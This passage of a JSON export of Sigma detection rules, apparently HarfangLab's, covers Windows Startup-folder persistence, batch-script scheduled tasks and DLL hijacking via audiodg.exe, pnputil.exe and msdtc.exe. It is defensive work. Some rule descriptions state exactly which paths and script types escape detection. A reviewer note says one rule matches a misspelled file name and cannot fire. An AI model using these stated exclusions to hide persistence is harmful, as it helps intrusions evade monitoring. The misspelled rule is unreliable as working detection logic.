exclusion_grouppolicy:\n # we need to whitelist svchost.exe with ProfSvc or gpsvc or GPSvcGroup in the command-line but we currently don't have this field in sigma for this event\n # C:\\windows\\system32\\svchost.exe -k GPSvcGroup\n Image:\n - '?:\\windows\\system32\\svchost.exe'\n - '?:\\windows\\syswow64\\svchost.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n 
exclusion_parent:\n ProcessParentImage:\n - '?:\\Program Files\\Synology\\SynologyDrive\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Synology\\SynologyDrive\\bin\\launcher.exe'\n - '?:\\Program Files\\Synology\\CloudStation\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Synology\\CloudStation\\bin\\launcher.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistps1.exe'\n - '?:\\Program Files (x86)\\Zebra Technologies\\Zebra Setup Utilities\\Driver\\ZBRN\\StatMonSetup.exe'\n\n exclusion_onenote:\n Image:\n - '*\\office1?\\OneNote.exe' # C:\\Program Files (x86)\\Microsoft Office\\Office16\\ONENOTE.EXE / C:\\PROGRA~2\\MICROS~2\\Office16\\ONENOTE.EXE\n - '?:\\Windows\\System32\\dllhost.exe' # C:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}\n - '?:\\program files\\citrix\\user profile manager\\userprofilemanager.exe'\n - '?:\\windows\\explorer.exe'\n Path:\n - '*OneNote.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk\n - '*\\an onenote senden.lnk'\n - '*\\OneNote ???? 
*.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_dropbox:\n # D:\\Profils\\XXXX\\AppData\\Roaming\\Dropbox\\bin\\Dropbox.exe\n Path|endswith: '\\Dropbox.lnk'\n Image: '*\\Dropbox.exe'\n\n exclusion_msdefender:\n # Microsoft System Center Data Protection Manager\n Path|endswith: '\\msdefender.jse'\n # image: C:\\Program Files\\Microsoft System Center\\DPM\\DPM\\bin\\DPMRA.exe\n # Path : C:\\Program Files\\Microsoft System Center\\DPM\\DPM\\Volumes\\Replica\\fdb3ead7-18a0-49a2-9de1-673e839a8b4e\\c66eb42f-e32b-4913-9459-67d54ed0049a\\Full\\ee5f7c51-a500-4723-9084-bdadfb26e458\\Full\\Profils\\xxxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msdefender.jse\n Image: '*\\DPMRA.exe'\n\n exclusion_anydesk:\n Path|endswith: '\\AnyDesk.lnk'\n ProcessProduct: 'AnyDesk'\n\n exclusion_parallels:\n Path|endswith: '\\Parallels Client.lnk'\n # Image: '?:\\Program Files\\Parallels\\Client\\APPServerClient.exe'\n\n exclusion_msiexec:\n Image|endswith: '\\msiexec.exe'\n ProcessOriginalFileName: 'msiexec.exe'\n ProcessCommandLine|endswith: '\\msiexec.exe /V'\n ProcessParentImage|endswith: '\\services.exe'\n\n exclusion_ocsinventory:\n # also seen: OCS-NG-Windows-Agent-Setup.exe\n # Image|endswith: '\\OcsSetup.exe'\n ProcessCompany:\n - 'OCS Inventory NG Team'\n - 'OCS Inventory Team'\n Path|endswith: '\\OCS Inventory NG Systray.lnk'\n\n exclusion_setuphost:\n # C:\\$WINDOWS.~BT\\Sources\\setuphost.exe\n Image: '?:\\\\?WINDOWS.~BT\\Sources\\setuphost.exe'\n # C:\\Windows\\SoftwareDistribution\\Download\\065fd01c95189f768f95256d0434663a\\WindowsUpdateBox.exe\n # F:\\_SMSTaskSequence\\Packages\\AXN001B9\\sources\\setupprep.exe\n ProcessParentImage:\n - '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_synology:\n ProcessParentImage|endswith: '\\AppData\\Local\\SynologyDrive\\SynologyDrive.app\\bin\\cloud-drive-ui.exe'\n 
Path|endswith: '\\Synology Drive Client.lnk'\n\n exclusion_citrix:\n Image: '*\\AppData\\Local\\Citrix\\SelfService\\Program Files\\SelfService.exe'\n Path|endswith:\n - '\\Citrix Workspace.lnk'\n - '\\Citrix Receiver.lnk'\n\n exclusion_signiant:\n Image: '*\\appdata\\roaming\\signiant\\signiantapp.exe'\n Path|endswith: '\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\signiant app.lnk'\n\n exclusion_citrix_gateway:\n Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\syswow64\\msiexec.exe'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Citrix Gateway.lnk'\n\n exclusion_dropnsign:\n Image: '*\\AppData\\Local\\Temp\\\\*\\signature-agent-install-?.?.?.tmp'\n Path|endswith: '\\Agent de signature DropNSign.lnk'\n\n exclusion_explorer_lnk:\n Image: '?:\\windows\\explorer.exe'\n Path|endswith:\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook.lnk'\n # AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook - Raccourci.lnk / handle multiple languages here\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Outlook - *.lnk'\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Sticky Notes.lnk'\n # 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MyNOEPhoneIPDesktop - Raccourci.lnk' / handle multiple languages here\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MyNOEPhoneIPDesktop - *.lnk'\n - 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Envoyer à OneNote.lnk'\n\n exclusion_mcafee_scan:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\McAfee Security Scan Plus.lnk'\n\n exclusion_bmc:\n # C:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe\n # D:\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe\n Image|endswith: '\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n 
Path|endswith:\n - '\\Wikit.lnk'\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ww_???' # (ww_283, ww_275, ...)\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ww_????' # (ww_2110)\n - ':\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\UpdateSignatureOutlook.lnk'\n\n exclusion_empirium_agent:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Empirum Inventory.lnk'\n\n exclusion_zebra_browser_print:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ZebraBrowserPrint.lnk'\n\n exclusion_titreo_webscan:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TitreoScan.lnk'\n\n exclusion_litetouch:\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\LiteTouch.lnk'\n # C:\\Windows\\System32\\wscript.exe C:\\MININT\\Scripts\\LiteTouch.wsf /start\n ProcessCommandLine|contains: ':\\MININT\\Scripts\\LiteTouch.wsf'\n\n exclusion_starleaf:\n Path|endswith: 'AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\StarLeaf.lnk'\n # C:\\Users\\xxxxx\\AppData\\Local\\StarLeaf\\StarLeaf\\1\\StarLeaf.exe\n Image: '*\\AppData\\Local\\StarLeaf\\StarLeaf\\\\?\\StarLeaf.exe'\n\n exclusion_hp_ink_cartridge:\n # C:\\Windows\\system32\\RunDll32.exe C:\\Program Files\\HP\\HP ENVY 5540 series\\bin\\HPStatusBL.dll,RunDLLEntry SERIALNUMBER=XXXXX;CONNECTION=USB;MONITOR=1;\n # C:\\windows\\system32\\RunDll32.exe C:\\Program Files\\HP\\HP Officejet Pro 8620\\bin\\HPStatusBL.dll,RunDLLEntry SERIALNUMBER=CN639FXXXXXW08W;CONNECTION=USB;MONITOR=1;\n # target : C:\\Users\\xxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Superviser les alertes relatives aux cartouches - HP ENVY 5540 series.lnk\n ProcessCommandLine: '?:\\Windows\\system32\\RunDll32.exe ?:\\Program Files\\HP\\\\*\\bin\\HPStatusBL.dll,RunDLLEntry *'\n\n exclusion_wapt:\n - Image|endswith: '\\waptagent.tmp' # 
C:\\Windows\\Temp\\is-M2GTK.tmp\\waptagent.tmp\n Path:\n - '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WAPT session setup.lnk'\n - '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\WAPT tray helper.lnk'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\waptconsole.exe'\n\n exclusion_elster_authenticator:\n # C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\i4j13789909157672610629.tmp\n # C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\i4j_writeperm_test\n # C:\\Users\\xxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\i4j17134246450829547984.tmp\n Image|contains: '\\.elster-authenticator\\updater\\ElsterAuthenticatorInstaller.exe'\n Path: '*\\Start Menu\\Programs\\StartUp\\i4j*'\n\n exclusion_deepl:\n Image|endswith: '\\DeepL.exe'\n Path|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DeepL.lnk'\n\n exclusion_hp_monitoring:\n # c:\\windows\\system32\\rundll32.exe c:\\program files\\hp\\hp deskjet 3510 series\\bin\\hpstatusbl.dll,rundllentry serialnumber=xxxxxxx;connection=usb;monitor=1\n # c:\\windows\\system32\\rundll32.exe c:\\program files\\hp\\hp smart tank plus 570 series\\bin\\hpstatusbl.dll,rundllentry serialnumber=cn11h4s0g2;connection=usb;monitor=1\n ProcessCommandLine|contains|all:\n - '?:\\windows\\system32\\rundll32.exe'\n - '\\bin\\hpstatusbl.dll,rundllentry'\n # programs\\startup\\monitor ink alerts - hp deskjet 2000 j210 series.lnk;\n # programs\\startup\\alertes de surveillance de l'encre - hp deskjet 2540 series.lnk\n Path: 'appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\\\* hp *.lnk'\n\n exclusion_zero_install:\n ProcessCommandLine: '*\\AppData\\Roaming\\Programs\\Zero Install\\0install.exe'\n Path: '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DeepL auto-start.lnk'\n\n exclusion_eolis:\n ProcessCommandLine|contains|all:\n - 
'\\AppData\\Local\\Temp\\'\n - '\\setup_pm.exe'\n - '?:\\Program Files\\Evolis Card Printer'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Evolis Printer Manager.lnk'\n\n exclusion_canon:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\EOS Utility.lnk'\n\n exclusion_emeditor:\n Image: '*\\AppData\\Local\\Programs\\EmEditor\\EmEditor.exe'\n Path: '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\EmEditor.lnk'\n\n exclusion_oobe:\n ProcessCommandLine: '?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n\n exclusion_rustdesk:\n ProcessParentImage: '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\rustdesk\\rustdesk.exe'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\RustDesk Tray.lnk'\n\n exclusion_podman:\n Image|endswith: '\\Podman Desktop.exe'\n Path|endswith: '\\podman-desktop.vbs'\n\n exclusion_printer:\n ProcessParentImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|endswith: '\\Error Recovery Guide.lnk'\n\n exclusion_spool:\n ProcessCommandLine|startswith:\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_ccm:\n - ProcessParentImage:\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessCommandLine|contains: '?:\\Windows\\ccmcache\\'\n\n exclusion_share:\n - ProcessAncestors|contains: '|\\\\\\\\'\n - ProcessCommandLine|contains:\n - 'cmd /c \\\\\\\\'\n - 'cmd.exe /c \\\\\\\\'\n - ProcessParentImage|startswith: '\\\\\\\\'\n - Path|startswith: '\\\\\\\\'\n\n exclusion_manageenfine:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\'\n\n exclusion_shellpreviewhost:\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe 
/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc3a404c-7d79-4d07-975a-c7ccf40276cf",
"rule_name": "File Added/Modified in Startup Directory",
"rule_description": "Detects when a file is added or modified in a per-user or all-users Startup directory.\nAdversaries may achieve persistence by adding a program, or a shortcut to one, to a startup folder.\nIt is recommended to investigate the content of the newly created file to determine if this action was legitimate.\nNote that this rule carries broad exclusions: any image under Program Files, svchost.exe (pending command-line fields for this event), and any activity whose ancestor, parent, command line or target path is a UNC path. A persistence file dropped through one of these will not alert.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc4003d0-b92e-4316-9e79-cab2b7d25546",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625640Z",
"creation_date": "2026-03-23T11:45:34.625642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625647Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1053_scheduled_task_batch_script_sus_loc.yml",
"content": "title: Scheduled Task with Batch Script Action Created in Suspicious Location\nid: fc4003d0-b92e-4316-9e79-cab2b7d25546\ndescription: |\n Detects the creation of a scheduled task whose content references a batch (.bat) script together with a location commonly abused by attackers (Users\\Public, ProgramData, the Windows directory or a user's AppData).\n It is common for attackers to create a scheduled task that launches a script or command that re-establishes a connection to their C&C servers, as a way to obtain persistence or to break the parent/child process relationship between the creating process and the payload.\n It is recommended to investigate the scheduled task by clicking the \"TaskInformation\" button, as well as any spawned processes, to determine if they are legitimate.\n Note that the '.bat' token and the folder are matched independently within the task content, not necessarily in the same action, and that .cmd scripts are not covered.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2025/09/04\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.execution\n - attack.t1059.003\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection_bat:\n OperationType: 'create'\n TaskContent|contains:\n - '.bat'\n - '.bat?'\n\n selection_folder:\n TaskContent|contains:\n - '*?:\\Users\\Public'\n - '*?:\\ProgramData'\n - '*?:\\Windows'\n - '*?:\\Users\\\\*\\AppData'\n\n exclusion_landesk:\n FirstActionCommandLine|contains: '?:\\ProgramData\\LANDesk'\n\n exclusion_corsair_icue:\n FirstActionCommandLine:\n # Sometimes these are forward slashes\n - 'cmd.exe /c ?:\\WINDOWS?Temp?icue-rmdir-????????-????-????-????-????????????.bat'\n - 'cmd.exe /c ?:\\WINDOWS?Temp?icue-task-????????-????-????-????-????????????.bat'\n\n exclusion_sap_business_objects:\n FirstActionCommandLine|startswith: '?:\\ProgramData\\SAP BusinessObjects\\'\n\n exclusion_hp_support:\n FirstActionCommandLine|startswith: 
'?:\\ProgramData\\HP\\HP Support Framework\\'\n\n condition: selection_bat and selection_folder and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc4003d0-b92e-4316-9e79-cab2b7d25546",
"rule_name": "Scheduled Task with Batch Script Action Created in Suspicious Location",
"rule_description": "Detects the creation of a scheduled task whose content references a batch (.bat) script together with a location commonly abused by attackers (Users\\Public, ProgramData, the Windows directory or a user's AppData).\nIt is common for attackers to create a scheduled task that launches a script or command that re-establishes a connection to their C&C servers, as a way to obtain persistence or to break the parent/child process relationship between the creating process and the payload.\nIt is recommended to investigate the scheduled task by clicking the \"TaskInformation\" button, as well as any spawned processes, to determine if they are legitimate.\nNote that the '.bat' token and the folder are matched independently within the task content, not necessarily in the same action, and that .cmd scripts are not covered.\n",
"rule_creation_date": "2025-09-04",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc40ab14-a52d-4398-a930-6b613e5641ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096485Z",
"creation_date": "2026-03-23T11:45:34.096487Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096492Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_audiodg.yml",
"content": "title: DLL Hijacking via audiodg.exe\nid: fc40ab14-a52d-4398-a930-6b613e5641ab\ndescription: |\n Detects potential Windows DLL Hijacking via audiodg.exe (Windows Audio Device Graph Isolation): a copy of the binary located outside the Windows system directories loading an mmdevapi.dll that is itself outside those directories and not signed by Microsoft.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable to a writable folder and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n NOTE(review): the selection matches ProcessOriginalFileName 'audioadg.exe', which appears to be a typo for audiodg.exe (the rule file is named ..._audiodg.yml); confirm the intended value, as the rule cannot fire against the real binary otherwise. Also, because any single filter suppresses the alert, a load by the genuine audiodg.exe under System32 is filtered regardless of where mmdevapi.dll comes from; only the copied-binary variant is covered.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'audioadg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mmdevapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc40ab14-a52d-4398-a930-6b613e5641ab",
"rule_name": "DLL Hijacking via audiodg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via audiodg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc83fd01-91c6-4c20-8c00-dfa808a060f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076024Z",
"creation_date": "2026-03-23T11:45:34.076025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076030Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pnputil.yml",
"content": "title: DLL Hijacking via pnputil.exe\nid: fc83fd01-91c6-4c20-8c00-dfa808a060f1\ndescription: |\n Detects potential Windows DLL Hijacking via pnputil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pnputil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\devobj.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc83fd01-91c6-4c20-8c00-dfa808a060f1",
"rule_name": "DLL Hijacking via pnputil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pnputil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fca3a43d-b571-4277-91e9-109e94c8ef22",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594764Z",
"creation_date": "2026-03-23T11:45:34.594768Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msdtc.yml",
"content": "title: DLL Hijacking via msdtc.exe\nid: fca3a43d-b571-4277-91e9-109e94c8ef22\ndescription: |\n Detects potential Windows DLL Hijacking via msdtc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msdtc.exe'\n ProcessSignature: 'Microsoft Windows'\n 